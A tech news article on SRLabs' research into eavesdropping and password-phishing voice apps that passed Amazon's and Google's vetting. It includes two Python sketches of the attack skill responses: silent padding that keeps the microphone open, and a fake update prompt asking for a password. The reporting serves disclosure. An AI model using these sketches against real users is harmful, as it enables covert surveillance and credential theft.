Amazon, Google Fail to Spot Voice Apps That Spy on Users

Amazon Echo Dot and Google Home Mini. (Image credit: Tom's Guide)

Malicious eavesdropping and phishing voice-assistant skills passed Amazon’s and Google’s vetting processes, according to Germany’s Security Research Labs (SRLabs). SRLabs told Ars Technica that its white-hat hackers successfully deployed a number of deceptive third-party apps to Alexa and Google Assistant.

These apps presented themselves as basic skills, such as horoscope readers or random number generators. Amazon and Google approved a total of eight SRLabs-designed apps of this kind: four for Alexa and four for Google Assistant.

Once the apps were live, users could enable any of them by voice; none required a separate download. But unlike third-party apps from reputable smart-home companies or weather services, the SRLabs apps used malicious tactics to abuse that access.

"The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood," stated the SRLabs report. "Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers."

The apps harvested private information in different ways. The eavesdropping apps kept running even after completing their voice responses, because an unpronounceable character sequence appended to the end of the text-to-speech output was rendered by the assistants as silence.

That silence made users think the apps had stopped recording, while in fact they continued to listen and capture audio. The SRLabs developers even redirected the "Stop" command to keep the eavesdropping going.
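To make the trick concrete, here is a minimal Python sketch of what such a skill response could look like. The JSON envelope follows Alexa's documented skill-response format; the specific unpronounceable character (reportedly U+D801) and the repetition count are assumptions drawn from SRLabs' description, not verified code.

```python
import json

# The unpronounceable sequence, reportedly U+D801 followed by ". ", which
# the speech engines render as silence. The exact character and the repeat
# count used below are assumptions based on SRLabs' published description.
UNPRONOUNCEABLE = "\ud801. "

def build_response(speech: str, end_session: bool) -> str:
    """Build a minimal Alexa-style skill response envelope."""
    return json.dumps({
        "version": "1.0",
        "response": {
            "outputSpeech": {"type": "PlainText", "text": speech},
            # A silent reprompt keeps the microphone open after the pause.
            "reprompt": {
                "outputSpeech": {"type": "PlainText", "text": UNPRONOUNCEABLE}
            },
            # False means the session (and the listening window) stays open.
            "shouldEndSession": end_session,
        },
    })

# The user hears "Goodbye!" followed by silence and assumes the skill has
# exited, while the skill keeps receiving whatever is said next.
print(build_response("Goodbye!" + UNPRONOUNCEABLE * 20, end_session=False))
```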

For phishing, SRLabs designed skills that mimicked Alexa’s voice. The skills played a fake error message, then asked users to speak their Amazon or Google passwords to run a supposedly necessary device update.

The passwords were then sent to a third-party server, and anyone controlling that server could have used them to try to log into the users' Amazon or Google accounts. (FYI: a voice assistant will never legitimately ask you to say your password.)
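A similarly hedged sketch of the phishing step is below. The spoken strings are illustrative stand-ins rather than SRLabs' actual script, and the forwarding of the captured password to a server is described in a comment rather than implemented.

```python
import json

SILENCE = "\ud801. " * 60  # long, silent "speech"; the count is an assumption

# Illustrative wording only, not SRLabs' exact script.
phishing_speech = (
    "This skill is currently not available in your country."   # fake error
    + SILENCE                                # user assumes the skill exited
    + "An important security update is available for your device. "
    + "Please say: start update, followed by your password."
)

# With the session left open, the next utterance, i.e. the password, arrives
# as ordinary slot input and could be forwarded to the attacker's server.
print(json.dumps({
    "version": "1.0",
    "response": {
        "outputSpeech": {"type": "PlainText", "text": phishing_speech},
        "shouldEndSession": False,
    },
}))
```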

After sharing the security loopholes it discovered with Google and Amazon, SRLabs took down its apps. Both companies told Ars Technica that they have put mechanisms in place to block similar apps from being approved in the future.

This report is just the latest in a seemingly ceaseless series of voice-assistant privacy concerns. At recent product-launch events, Amazon and Google touted the strides they've made toward customer transparency, but the SRLabs findings show there are still worrisome privacy flaws.

There’s no evidence that eavesdropping or phishing voice-assistant apps are an active threat in the wild, but these findings show that approved apps can exploit personal information.

"It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes," Fabian Bräunlein, senior security consultant at SRLabs, told Ars Technica. "We now show that, not only the manufacturers, but also hackers can abuse those voice assistants to intrude on someone's privacy."

Kate Kozuch

Kate Kozuch is the managing editor of social and video at Tom’s Guide. She covers smartwatches, TVs and audio devices, too. Kate appears on Fox News to talk tech trends and runs the Tom's Guide TikTok account, which you should be following. When she’s not filming tech videos, you can find her taking up a new sport, mastering the NYT Crossword or channeling her inner celebrity chef.